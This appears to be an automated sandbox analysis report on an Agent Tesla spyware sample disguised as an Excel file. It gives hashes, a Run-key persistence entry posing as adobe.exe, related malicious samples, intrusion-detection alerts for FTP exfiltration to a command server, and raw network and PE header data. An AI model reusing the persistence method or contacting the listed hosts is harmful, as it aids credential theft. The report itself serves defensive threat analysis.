                            Number of analysed new started processes analysed:11
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:BL NBNSA240600050.xlsx.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@9/4@2/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 97%
                            • Number of executed functions: 431
                            • Number of non-executed functions: 28
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • VT rate limit hit for: BL NBNSA240600050.xlsx.exe
                            TimeTypeDescription
                            09:04:51API Interceptor5277750x Sleep call for process: BL NBNSA240600050.xlsx.exe modified
                            09:05:07API Interceptor8725936x Sleep call for process: adobe.exe modified
                            14:04:58AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run adobe C:\Users\user\AppData\Roaming\adobe\adobe.exe
                            14:05:06AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run adobe C:\Users\user\AppData\Roaming\adobe\adobe.exe
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            104.26.12.205SecuriteInfo.com.Win64.Evo-gen.28044.10443.exeGet hashmaliciousUnknownBrowse
                            • api.ipify.org/
                            vstdlib_s64.dll.dllGet hashmaliciousQuasarBrowse
                            • api.ipify.org/
                            6OiUEubyA8.msiGet hashmaliciousQuasarBrowse
                            • api.ipify.org/
                            SecuriteInfo.com.Win64.RansomX-gen.22171.1307.exeGet hashmaliciousConti, PureLog Stealer, Targeted RansomwareBrowse
                            • api.ipify.org/
                            482730621.exeGet hashmaliciousStealitBrowse
                            • api.ipify.org/?format=json
                            482730621.exeGet hashmaliciousStealitBrowse
                            • api.ipify.org/?format=json
                            Sonic-Glyder.exeGet hashmaliciousStealitBrowse
                            • api.ipify.org/?format=json
                            Sky-Beta.exeGet hashmaliciousStealitBrowse
                            • api.ipify.org/?format=json
                            SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exeGet hashmaliciousBunny LoaderBrowse
                            • api.ipify.org/
                            lods.cmdGet hashmaliciousRemcosBrowse
                            • api.ipify.org/
                            213.189.52.181DC74433Y7889021.xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              PRE ALERT Docs_PONBOM01577.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                                Ship Docs YINGHAI-MANE PO 240786.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  s4.serv00.comDC74433Y7889021.xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 213.189.52.181
                                  PRE ALERT Docs_PONBOM01577.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                                  • 213.189.52.181
                                  Ship Docs YINGHAI-MANE PO 240786.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                                  • 213.189.52.181
                                  api.ipify.orgCotizaci#U00f3n.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 104.26.12.205
                                  Doc_322_0105.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.26.13.205
                                  SecuriteInfo.com.Win32.PWSX-gen.14778.18726.exeGet hashmaliciousAgentTeslaBrowse
                                  • 172.67.74.152
                                  SecuriteInfo.com.Win32.PWSX-gen.11837.10886.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                  • 104.26.13.205
                                  Purchase, Order no X850580.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 172.67.74.152
                                  po.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 104.26.13.205
                                  DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                  • 172.67.74.152
                                  INV 66077.xlsGet hashmaliciousAgentTeslaBrowse
                                  • 104.26.12.205
                                  PO 1068 PDF.gz.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 104.26.13.205
                                  LCWGT83qLa.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.26.13.205
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  CLOUDFLARENETUSfile.exeGet hashmaliciousAmadey, Babadeda, LummaC Stealer, PureLog Stealer, RedLine, Stealc, VidarBrowse
                                  • 172.64.41.3
                                  Cotizaci#U00f3n.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 104.26.12.205
                                  5i4hBrTNHm.rtfGet hashmaliciousAgentTeslaBrowse
                                  • 172.66.43.27
                                  Doc_322_0105.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.26.13.205
                                  fd0987654345.exeGet hashmaliciousRemcosBrowse
                                  • 188.114.97.3
                                  DST0987654567800PO.exeGet hashmaliciousVIP KeyloggerBrowse
                                  • 188.114.96.3
                                  D9p6evtbwe.rtfGet hashmaliciousUnknownBrowse
                                  • 172.66.40.229
                                  FG678900987600.exeGet hashmaliciousRemcosBrowse
                                  • 188.114.97.3
                                  iWRmEn1DDT.rtfGet hashmaliciousRemcosBrowse
                                  • 172.66.43.27
                                  4Ear91jgQ7.exeGet hashmaliciousFormBookBrowse
                                  • 23.227.38.74
                                  ECO-ATMAN-PLECO-ATMAN-PLDC74433Y7889021.xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 213.189.52.181
                                  https://skposta.serv00.net/Get hashmaliciousUnknownBrowse
                                  • 128.204.223.100
                                  PRE ALERT Docs_PONBOM01577.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                                  • 213.189.52.181
                                  BOQ_Algeemi_SharePoint_Tender_3768889756.xksx.exeGet hashmaliciousAgentTeslaBrowse
                                  • 91.185.189.19
                                  http://10f4cf3.wcomhost.com/Get hashmaliciousUnknownBrowse
                                  • 85.194.241.205
                                  Ship Docs YINGHAI-MANE PO 240786.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                                  • 213.189.52.181
                                  BOQ_Algeemi_SharePoint_Tender.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                                  • 91.185.189.19
                                  OriginalMessage.txt.msgGet hashmaliciousHTMLPhisherBrowse
                                  • 31.186.83.254
                                  Invoice_23257538_PDF.wsfGet hashmaliciousGuLoaderBrowse
                                  • 31.186.83.248
                                  WEB-SAT_base.apkGet hashmaliciousUnknownBrowse
                                  • 77.79.227.218
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  3b5074b1b5d032e5620f69f9f700ff0eCotizaci#U00f3n.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • 104.26.12.205
                                  Doc_322_0105.exeGet hashmaliciousAgentTeslaBrowse
                                  • 104.26.12.205
                                  4Ear91jgQ7.exeGet hashmaliciousFormBookBrowse
                                  • 104.26.12.205
                                  kHeNppYRgN.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  • 104.26.12.205
                                  QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                  • 104.26.12.205
                                  QUOTATION_JULQTRA071244.PDF.scr.exeGet hashmaliciousUnknownBrowse
                                  • 104.26.12.205
                                  QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                  • 104.26.12.205
                                  QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                  • 104.26.12.205
                                  QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                  • 104.26.12.205
                                  QUOTATION_JULQTRA071244.PDF.scr.exeGet hashmaliciousUnknownBrowse
                                  • 104.26.12.205
                                  No context
                                  Process:C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1415
                                  Entropy (8bit):5.352427679901606
                                  Encrypted:false
                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                                  MD5:97AD91F1C1F572C945DA12233082171D
                                  SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                                  SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                                  SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                                  Malicious:true
                                  Reputation:moderate, very likely benign file
                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc
                                  Process:C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1415
                                  Entropy (8bit):5.352427679901606
                                  Encrypted:false
                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                                  MD5:97AD91F1C1F572C945DA12233082171D
                                  SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                                  SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                                  SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc
                                  Process:C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):830464
                                  Entropy (8bit):7.857229543409421
                                  Encrypted:false
                                  SSDEEP:24576:p+1bAypcVKaAbK7hZ9Auf0K/KoLO8CZXCmFv:oVOca8K7f9rcK/HGl
                                  MD5:7DC8BA9345DE935C7B90EA6C61F3464F
                                  SHA1:78786835C8B7B91C0223E970A45B50176EB96B33
                                  SHA-256:FCA147EE2F07C81F599B17E6957D45B40DD29518E9FF97BB90B742EA1C27BCEA
                                  SHA-512:47AD7A37A6B95873120F256C957EAF5DE91A2B6C05E86238C79F5DAAE130974B1B10C01459E8E2C0AE0C8B051225C1784C20807F2E9813D7ACB3760B4A9A29F3
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 74%
                                  Reputation:low
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....ou...............0..N...\.......m... ........@.. ....................................@.................................Ym..O........X...........................B..p............................................ ............... ..H............text....M... ...N.................. ..`.rsrc....X.......Z...P..............@..@.reloc..............................@..B.................m......H............u......0...,5...............................................0..L.........}.....(.......(......(............s......(.....o......( ....o!.....("....*.0..K.........}........(#........($.....,5...(............s......(.....o......(.....o!....8.....r...p.X...(%...o&...tX.......('..........9.....s.........s(...s)...o*.......o+...(,.......o-...(........o/...(0.......o1...(2.......o3...(4.......o5...(6.........(7.....(......+....s(...s)...(*........(8...........s......(..
                                  Process:C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:modified
                                  Size (bytes):26
                                  Entropy (8bit):3.95006375643621
                                  Encrypted:false
                                  SSDEEP:3:ggPYV:rPYV
                                  MD5:187F488E27DB4AF347237FE461A079AD
                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                  Malicious:true
                                  Reputation:high, very likely benign file
                                  Preview:[ZoneTransfer]....ZoneId=0
                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):7.857229543409421
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  • DOS Executable Generic (2002/1) 0.01%
                                  File name:BL NBNSA240600050.xlsx.exe
                                  File size:830'464 bytes
                                  MD5:7dc8ba9345de935c7b90ea6c61f3464f
                                  SHA1:78786835c8b7b91c0223e970a45b50176eb96b33
                                  SHA256:fca147ee2f07c81f599b17e6957d45b40dd29518e9ff97bb90b742ea1c27bcea
                                  SHA512:47ad7a37a6b95873120f256c957eaf5de91a2b6c05e86238c79f5daae130974b1b10c01459e8e2c0ae0c8b051225c1784c20807f2e9813d7acb3760b4a9a29f3
                                  SSDEEP:24576:p+1bAypcVKaAbK7hZ9Auf0K/KoLO8CZXCmFv:oVOca8K7f9rcK/HGl
                                  TLSH:7605014723A4CB41F1BA37F9687A441407B1BD2A59A5CA5F4DCD3CFF58B1B804A22367
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....ou...............0..N...\.......m... ........@.. ....................................@................................
                                  Icon Hash:31d89a929298d027
                                  Entrypoint:0x4c6dae
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Time Stamp:0xA1756FE1 [Wed Nov 3 04:15:29 2055 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                  Instruction
                                  jmp dword ptr [00402000h]
                                  inc edi
                                  add byte ptr [edi+00h], al
                                  inc edx
                                  add byte ptr [eax+eax], dh
                                  inc ecx
                                  add byte ptr [eax], bh
                                  add byte ptr [eax+eax], dh
                                  inc esi
                                  add byte ptr [edi], dh
                                  add byte ptr [5A003300h], dh
                                  add byte ptr [ecx], bh
                                  add byte ptr [eax], bh
                                  add byte ptr [eax+eax], dh
                                  aaa
                                  add byte ptr [34005A00h], dh
                                  add byte ptr [ecx+00h], bl
                                  push esp
                                  add byte ptr [eax+eax+00h], dl
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xc6d590x4f.text
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x58b0.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xce0000xc.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xc42f40x70.text
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x20000xc4de40xc4e009d79fb91c4e9ad0b1dd8561b69a5be8eFalse0.9122594246031746data7.880091500507158IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rsrc0xc80000x58b00x5a005529da2d4770d6994ad8320ee8b5cf22False0.30668402777777776data5.330660277582464IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0xce0000xc0x20038e29ca0858fb07b913b2317f1829522False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_ICON0xc81f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.4920212765957447
                                  RT_ICON0xc86580x988Device independent bitmap graphic, 24 x 48 x 32, image size 23040.32704918032786884
                                  RT_ICON0xc8fe00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.2303001876172608
                                  RT_ICON0xca0880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.15995850622406638
                                  RT_ICON0xcc6300xc1dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.8742341180264431
                                  RT_GROUP_ICON0xcd2500x4cdata0.75
                                  RT_VERSION0xcd29c0x428data0.4116541353383459
                                  RT_MANIFEST0xcd6c40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                  DLLImport
                                  mscoree.dll_CorExeMain
                                  TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                  2024-07-23T15:05:21.347468+0200TCP2855542ETPRO MALWARE Agent Tesla CnC Exfil Activity4974863434192.168.2.4213.189.52.181
                                  2024-07-23T15:05:21.331691+0200TCP2855542ETPRO MALWARE Agent Tesla CnC Exfil Activity4974863434192.168.2.4213.189.52.181
                                  2024-07-23T15:04:59.113823+0200TCP2029927ET MALWARE AgentTesla Exfil via FTP4973421192.168.2.4213.189.52.181
                                  2024-07-23T15:05:20.765442+0200TCP2029927ET MALWARE AgentTesla Exfil via FTP4974721192.168.2.4213.189.52.181
                                  2024-07-23T15:04:59.688534+0200TCP2855542ETPRO MALWARE Agent Tesla CnC Exfil Activity4973663043192.168.2.4213.189.52.181
                                  2024-07-23T15:04:59.682766+0200TCP2855542ETPRO MALWARE Agent Tesla CnC Exfil Activity4973663043192.168.2.4213.189.52.181
                                  TimestampSource PortDest PortSource IPDest IP
                                  Jul 23, 2024 15:04:55.530328035 CEST49732443192.168.2.4104.26.12.205
                                  Jul 23, 2024 15:04:55.530364990 CEST44349732104.26.12.205192.168.2.4
                                  Jul 23, 2024 15:04:55.530428886 CEST49732443192.168.2.4104.26.12.205
                                  Jul 23, 2024 15:04:55.543821096 CEST49732443192.168.2.4104.26.12.205
                                  Jul 23, 2024 15:04:55.543833017 CEST44349732104.26.12.205192.168.2.4
                                  Jul 23, 2024 15:04:56.032614946 CEST44349732104.26.12.205192.168.2.4
                                  Jul 23, 2024 15:04:56.032715082 CEST49732443192.168.2.4104.26.12.205
                                  Jul 23, 2024 15:04:56.037194014 CEST49732443192.168.2.4104.26.12.205
                                  Jul 23, 2024 15:04:56.037203074 CEST44349732104.26.12.205192.168.2.4
                                  Jul 23, 2024 15:04:56.037592888 CEST44349732104.26.12.205192.168.2.4
                                  Jul 23, 2024 15:04:56.083497047 CEST49732443192.168.2.4104.26.12.205
                                  Jul 23, 2024 15:04:56.087587118 CEST49732443192.168.2.4104.26.12.205
                                  Jul 23, 2024 15:04:56.132503986 CEST44349732104.26.12.205192.168.2.4
                                  Jul 23, 2024 15:04:56.213104963 CEST44349732104.26.12.205192.168.2.4
                                  Jul 23, 2024 15:04:56.213273048 CEST44349732104.26.12.205192.168.2.4
                                  Jul 23, 2024 15:04:56.213416100 CEST49732443192.168.2.4104.26.12.205
                                  Jul 23, 2024 15:04:56.241009951 CEST49732443192.168.2.4104.26.12.205
                                  Jul 23, 2024 15:04:57.194710016 CEST4973421192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:04:57.200380087 CEST2149734213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:04:57.203509092 CEST4973421192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:04:57.831351995 CEST2149734213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:04:57.831691980 CEST4973421192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:04:57.836802959 CEST2149734213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:04:58.029808044 CEST2149734213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:04:58.030071974 CEST4973421192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:04:58.034923077 CEST2149734213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:04:58.308783054 CEST2149734213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:04:58.308954954 CEST4973421192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:04:58.320347071 CEST2149734213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:04:58.509210110 CEST2149734213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:04:58.509377003 CEST4973421192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:04:58.515353918 CEST2149734213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:04:58.709877014 CEST2149734213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:04:58.710068941 CEST4973421192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:04:58.725223064 CEST2149734213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:04:58.913053036 CEST2149734213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:04:58.913338900 CEST4973421192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:04:58.920022011 CEST2149734213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:04:59.108258009 CEST2149734213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:04:59.108740091 CEST4973663043192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:04:59.113656044 CEST6304349736213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:04:59.113725901 CEST4973663043192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:04:59.113822937 CEST4973421192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:04:59.125436068 CEST2149734213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:04:59.682493925 CEST2149734213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:04:59.682765961 CEST4973663043192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:04:59.682765961 CEST4973663043192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:04:59.687810898 CEST6304349736213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:04:59.688446045 CEST6304349736213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:04:59.688534021 CEST4973663043192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:04:59.724085093 CEST4973421192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:04:59.877233982 CEST2149734213.189.52.181192.168.2.4
                                  Jul 23, 2024 15:04:59.927411079 CEST4973421192.168.2.4213.189.52.181
                                  Jul 23, 2024 15:05:09.623667955 CEST49738443192.168.2.4104.26.12.205
                                  Jul 23, 2024 15:05:09.623733044 CEST44349738104.26.12.205192.168.2.4
                                  Jul 23, 2024 15:05:09.623809099 CEST49738443192.168.2.4104.26.12.205
                                  Jul 23, 2024 15:05:09.626526117 CEST49738443192.168.2.4104.26.12.205
                                  Jul 23, 2024 15:05:09.626547098 CEST44349738104.26.12.205192.168.2.4
                                  Jul 23, 2024 15:05:10.574337006 CEST44349738104.26.12.205192.168.2.4
                                  Jul 23, 2024 15:05:10.574460983 CEST49738443192.168.2.4104.26.12.205
                                  Jul 23, 2024 15:05:10.576040030 CEST49738443192.168.2.4104.26.12.205
                                  Jul 23, 2024 15:05:10.576054096 CEST44349738104.26.12.205192.168.2.4
                                  Jul 23, 2024 15:05:10.576308966 CEST44349738104.26.12.205192.168.2.4
                                  Jul 23, 2024 15:05:10.628518105 CEST49738443192.168.2.4104.26.12.205
                                  Jul 23, 2024 15:05:10.672501087 CEST44349738104.26.12.205192.168.2.4
                                  Jul 23, 2024 15:05:10.736783981 CEST44349738104.26.12.205192.168.2.4
                                  Jul 23, 2024 15:05:10.736845016 CEST44349738104.26.12.205192.168.2.4
